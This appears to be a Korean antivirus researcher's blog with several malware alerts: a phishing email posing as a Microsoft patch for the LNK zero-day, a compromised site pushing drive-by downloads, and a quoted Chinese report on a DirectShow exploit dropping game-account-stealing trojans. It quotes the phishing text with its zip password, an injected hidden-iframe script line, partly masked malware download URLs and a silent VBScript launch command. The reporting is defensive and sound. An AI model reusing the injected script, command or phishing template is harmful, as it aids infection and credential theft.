태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

신종악성코드정보2010.07.28 10:15


마이크로 소프트사의 Lnk(바로가기, Shortcut) Zero-Day 취약점(패치 미발표)을 이용한 악성코드가 이번에는 마이크로 소프트사의 취약점 패치 파일로 위장하여 유포 된 것이 보고되었습니다.

해당 취약점을 이용한 악성코드가 관련 취약점 패치 파일로 위장한 어처구니 없는 위장 공격이네요!

이메일 내용은 다음과 같습니다.

제목 :
Microsoft Windows Security Advisory

내용 :
Hello, we are writing to you about a new Microsoft security advisory issue for Windows.
There is a new potentially dangerous software-worm, attacking Windows users
through an old bug when executing .ICO files. Although this is quite an old
way of infecting software, which first was used in 1982 with Elk Cloner
worm, the new technique the new worm is using is more complicated, thus the
speed and number of attacs has strongly increased.

Since you are the special Microsoft Windows user, there is a new patch
attached to this e-mail, which eliminates the possibility of having you
software infected.

How to install:
open an attached file "2286198.zip" with password "security"
install it to the base disk C:/ folder, so that the included files adres was "C:/lol.dll"

첨부파일 :
2286198.zip

첨부파일은 다음과 같이 "2286198.zip" 파일명을 가지고 있는데, 파일명에 사용된 2286198 번호는 실제 Lnk 취약점 번호 입니다.

http://microsoft.com/technet/security/advisory/2286198.mspx

첨부파일은 다음과 같은 압축파일로 구성되어 있으며, 암호화 압축이 되어 있는 상태입니다.
따라서 Virus Total 에서는 어떠한 제품도 진단할 수 없습니다.

http://www.virustotal.com/analisis/38d570a765f7fd7b1b92a76bf1fdfe7425e41dddd5081493eef975228470ae7d-1279917049

압축파일의 암호는 메일 본문에 포함되어 있으며, "security" 입니다.

사용자 삽입 이미지

내부에 포함되어 있는 dsafnegweje.lnk 파일이 바로 Lnk 0-day Exploit 파일이며, 바이러스 토탈에 등록되어 있는 Anti-Virus 제품들의 진단 현황은 다음과 같습니다.

http://www.virustotal.com/analisis/bbe8069f457c8cd3d1162419626da72b1041304c558a1be74cb3b553dbb29965-1280242380

lol.dll 파일은 악성 dll 파일이며, 바이러스 토탈 진단 현황은 다음과 같고, nProtect Anti-Virus 2010년 7월 28일 업데이트에 치료 기능을 추가할 예정입니다.

http://www.virustotal.com/analisis/40ca83cbf5f5125f559a438d2e3de3c9d4bd8ad3dfcc70e23e1f4d76f7c38750-1280279440

LNK 취약점을 통해서 지속적으로 악성코드가 유포 중이오니, 각별히 조심하셔야 겠습니다.



Posted by viruslab
신종악성코드정보2009.07.14 13:32


http://viruslab.tistory.com/921

Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution

http://www.microsoft.com/technet/security/advisory/973472.mspx

신규 0-Day 공격 보고가 증가하고 있습니다.

이전 MPEG 0-Day 취약점 공격도 국내에 보고되고 있는 상황입니다.

http://viruslab.tistory.com/909

모두 주의하셔야 할 것 같습니다.

사용자 삽입 이미지




Posted by viruslab
신종악성코드정보2009.07.12 11:23


http://viruslab.tistory.com/887

사용자 삽입 이미지

기존에 H.exe 를 유포했던 공격자(조직)가 이번에 Zero-Day 취약점을 통해서 악성코드 유포를 진행 중입니다.

http://www.(생략).co.kr/
http://www.(생략).co.kr/Lib/Script/common.js
}document.write('<iframe height=0 width=0 src="http://211.(생략).65/index.htm"></iframe>');

Zero-Day Exploit Code -> 임시조치 -> http://support.microsoft.com/kb/972890

http://211.(생략).65/logo.jpg
http://211.(생략).65/go1.jpg
http://211.(생략).65/go.jpg
http://211.(생략).65/go2.jpg

설치되는 EXE 악성코드

http://www.(생략).or.kr/HH.exe
http://www.(생략).kr/admin/order/mlist/3.txt
http://www.(생략).kr/admin/order/mlist/ip.rar

감염이 이루어지면 시스템 폴더에 다음과 같은 파일이 생성(일부 숨김속성)됩니다.

zhido.exe
e8main0.dll
cao110.dll
cao220.dll

윈도우 폴더에 생성되는 AhnRpta.exe 는 정상적인 메모장(notepad.exe)파일의 복사본이며, 이것을 이용해서 특정 사이트에 접속하여 변종을 다운로드 하는 매개체로 사용합니다.

cao220.dll 파일은 {C8414FA0-BA90-4600-B7EA-0CEFAF5A0636} CLSID 값을 이용합니다.

ip.rar 파일은 RAR 파일처럼 위장하고 있으며, 암호화된 형식으로 실제로는 zhido.exe 로 설치됩니다.

Posted by viruslab
신종악성코드정보2009.07.07 08:49


http://www.nprotect.com/v6/contents/index.php?mode=inca_sc_view&no=68

사용자 삽입 이미지

중국내에서 악성코드 유포에 사용되고 있으며, 현재 이 시간 유포가 진행되고 있는 사이트가 존재한다.

Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit漏洞
受影响的软件:
Microsoft DirectShow(msvidctl.dll)
描述和解决方案:
安装安天防线2009和锐甲可以阻挡Microsoft DirectShow微软视频0DAY漏洞网马

1、网页木马直接下载的病毒文件:
http://xin765***.com/wm/svchost.exe 病毒名:Trojan/Win32.Killav.gg[Dropper]
描述:下载者木马,关闭安全软件进程、连接网络下载大量病毒文件
衍生文件:
c:\WINDOWS\system32\drivers\etc\hosts
c:\WINDOWS\system32\drivers\OLD3.tmp
c:\WINDOWS\system32\drivers\pcidump.sys
c:\WINDOWS\system32\drivers\acpiec.sys
c:\WINDOWS\system32\dllcache\acpiec.sys
c:\WINDOWS\system32\func.dll
c:\WINDOWS\phpq.dll
c:\WINDOWS\LastGood\system32\drivers\acpiec.sys
c:\1.exe
c:\autorun.inf
2、病毒读取网络下载列表地址:
http://babi2009***.com/360/aa1dfh.txt
3、由下载者木马下载的其他病毒文件:
http://haha888l***.com/xiao/aa1.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:梦幻西游盗号木
衍生文件:
c:\WINDOWS\system32\kSVHjMeWr5ZZY47.dll
c:\WINDOWS\Fonts\F5hFtXrw8.Ttf

http://haha888l***.com/xiao/aa2.exe 病毒名:Trojan/Win32.Magania.bjsy[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\EN7hzSreCat8.dll
c:\WINDOWS\system32\dfc8ac3ed7da.dll
c:\WINDOWS\system32\comres.dll
c:\WINDOWS\Fonts\R6WhWBmZsEdPZDjQP.Ttf

http://haha888l***.com/xiao/aa3.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:封神榜?网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\JPccCJnKygDdp3.dll
c:\WINDOWS\Fonts\uawyv9Pr.Ttf

http://haha888l***.com/xiao/aa4.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
描述:大话西游 ii游戏盗号木马
衍生文件:
c:\WINDOWS\system32\GsfMwDWD3.dll
c:\WINDOWS\Fonts\QT7f3JmmJrcx.Ttf

http://haha888l***.com/xiao/aa5.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\m75TJUvNjzQF.Ttf
c:\WINDOWS\Fonts\wQ7KbaNZKMe5G4qZ.fon

http://haha888l***.com/xiao/aa6.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\xg4hAPNygs29.dll
c:\WINDOWS\Fonts\K7XaTBMWp8TPrYgw.Ttf

http://haha888l***.com/xiao/aa7.exe 病毒名:Trojan/Win32.Magania.bkii[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\dktXFYbT3G.dll
c:\WINDOWS\Fonts\xFQymHn5e4keKWye.Ttf

http://haha888l***.com/xiao/aa8.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\P2xnxaS5acXpS95.dll
c:\WINDOWS\Fonts\m75TJUvNjzQF.Ttf

http://haha888l***.com/xiao/aa9.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:剑侠世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\skcfujQ5EDN.dll
c:\WINDOWS\Fonts\YywxhF7TSnkktrJw.Ttf

http://haha888l***.com/xiao/aa10.exe 病毒名:Trojan/Win32.Magania.bfws[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\T4HyJ7uGEauA.Ttf
c:\WINDOWS\Fonts\MqppW9KYn.fon

http://haha888l***.com/xiao/aa11.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\taNjsFa2tT2Dh.dll
c:\WINDOWS\Fonts\RCZbVbjCY6wYszD3.Ttf

http://haha888l***.com/xiao/aa12.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:生存之旅游戏盗号木马
衍生文件:
c:\WINDOWS\system32\704C3595.dll
c:\WINDOWS\Fonts\S8a8cnEuaydPJGg8.Ttf

http://haha888l***.com/xiao/aa13.exe 病毒名:Trojan/Win32.Magania.bfdq[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\E4814792.dll
c:\WINDOWS\Fonts\EEUJgNKN6xmNqKr6.Ttf

http://haha888l***.com/xiao/aa14.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
描述:传奇游戏盗号木
衍生文件:
c:\WINDOWS\Fonts\MhaUKGazkr3fZZKp.Ttf
c:\WINDOWS\Fonts\fyrwJf5Qfhh.fon

http://haha888l***.com/xiao/aa15.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:诛仙游戏盗号木
衍生文件:
c:\WINDOWS\system32\A0C86020.dll
c:\WINDOWS\Fonts\6e6EUdxVeWUYJynN.Ttf

http://haha888l***.com/xiao/aa16.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\BqfKfz6gSK.Ttf
c:\WINDOWS\Fonts\zAPWgSjGrSpdsE4.fon

http://haha888l***.com/xiao/aa17.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\qB5BKZy7vR5m.dll
c:\WINDOWS\Fonts\PeMTdMfqzpGTb5ps.Ttf

http://haha888l***.com/xiao/aa18.exe 病毒名:Trojan/Win32.Magania.bfsy[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\JNwybEjgUVaxBU5d.Ttf
c:\WINDOWS\Fonts\CESPVP8FQd.fon

http://haha888l***.com/xiao/aa19.exe 病毒名:Trojan/Win32.Magania.bfsy[GameThief]
描述:QQ厦华游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\pDuuqr4BgFn65AeW.Ttf
c:\WINDOWS\Fonts\vwuXtYbhj.fon

http://haha888l***.com/xiao/aa20.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:大话西游3游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ndxq9awMc.dll
c:\WINDOWS\Fonts\CRp3uYCmcxMp3qQn9.Ttf

http://haha888l***.com/xiao/aa21.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:魔域游戏盗号木
衍生文件:
c:\WINDOWS\system32\08223B03.dll
c:\WINDOWS\Fonts\eCgMhGRkPUcdutd0.Ttf

http://haha888l***.com/xiao/aa22.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:诛仙游戏盗号木
衍生文件:
c:\WINDOWS\system32\122B901E.dll
c:\WINDOWS\Fonts\cFDPmh3MDPjcHMPd.Ttf

http://haha888l***.com/xiao/aa23.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:诛仙游戏盗号木
衍生文件:
c:\WINDOWS\system32\dhDhwS7fFW.dll
c:\WINDOWS\Fonts\cD9KArZZUHxCqnyM.Ttf

http://haha888l***.com/xiao/aa24.exe 病毒名:Trojan/Win32.Magania.bkcz[GameThief]
描述:永恒之塔游戏盗号木马
衍生文件:
c:\WINDOWS\system32\Va7SpUWgCA5f.dll
c:\WINDOWS\Fonts\FCvvnT2B.Ttf

http://haha888l***.com/xiao/aa25.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
描述:封神榜网络版游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\EHMs25j4ArEwPKHS.Ttf
c:\WINDOWS\Fonts\vgUGf6VF2E.fon

http://haha888l***.com/xiao/aa26.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:封神榜网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ybM7kf9heVHDx.dll
c:\WINDOWS\Fonts\EcZFMzAp3.Ttf

http://haha888l***.com/xiao/aa27.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
描述:传奇外传游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\du3Q2JXbHYGxcSAe.Ttf
c:\WINDOWS\Fonts\tY5UFS434YYd.fon

http://haha888l***.com/xiao/aa28.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\GU6f5sW42mdc.dll
c:\WINDOWS\Fonts\avJ9SdDwMd9Qzt.Ttf

http://haha888l***.com/xiao/aa29.exe Trojan/Win32.Magania.bfrp[GameThief]
描述:华夏2游戏盗号木马
衍生文件:
c:\WINDOWS\system32\2EF0D734.dll
c:\WINDOWS\Fonts\Qq3qg7RGSp9raxWW.Ttf

http://haha888l***.com/xiao/aa30.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\RhdwE8NYdbqQ.dll
c:\WINDOWS\Fonts\BqfKfz6gSK.Ttf

http://haha888l***.com/xiao/aa31.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\wadSSw5k.dll
c:\WINDOWS\Fonts\Vx53f7Scj63HVHDE.Ttf

http://haha888l***.com/xiao/aa32.exe 病毒名:Trojan/Win32.Magania.bkcv[GameThief]
描述:梦幻西游online游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\F5hFtXrw8.Ttf
c:\WINDOWS\Fonts\xbpCfXnG6wUVF.fon

http://haha888l***.com/xiao/aa33.exe 病毒名:Trojan/Win32.OnLineGames.bmiz[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\usbvmx.dll
c:\WINDOWS\system32\ed78ab9.dll
c:\WINDOWS\Fonts\yGMHUAj5Npydj8FZ.ttf

http://haha888l***.com/xiao/aa34.exe 病毒名:Trojan/Win32.QQFish.l[PSW]
描述:钓鱼木马伪装QQ官方发布中奖信息
衍生文件:
c:\WINDOWS\system32\www.qq13x.cn

http://haha888l***.com/xiao/aa35.exe 病毒名:Trojan/Win32.OnLineGames.bmzy[GameThief]
描述:QQ盗号木马
衍生文件:
c:\Documents and Settings\a\Application Data\Set8.dll
c:\Documents and Settings\a\Application Data\Set8.tmp
c:\Documents and Settings\a\Application Data\R8.bak

http://haha888l***.com/xiao/aa36.exe 病毒名:Trojan/Win32.Agent.fn[DDoS]
描述:后门木马,发布DDOS攻击
衍生文件:
c:\WINDOWS\system32\aa36.exe

http://haha888l***.com/xiao/1.exe 病毒名:Trojan/VBS.IEstart.e
描述:利用脚本执行命令:
vbscript:CreateObject("WScript.Shell").Run("iexplore http://tj.mehoab***.com/bb/tj1jdoiash.htm",0)(window.close)连接该域名地址发送安装统计信息
衍生文件:无


Posted by viruslab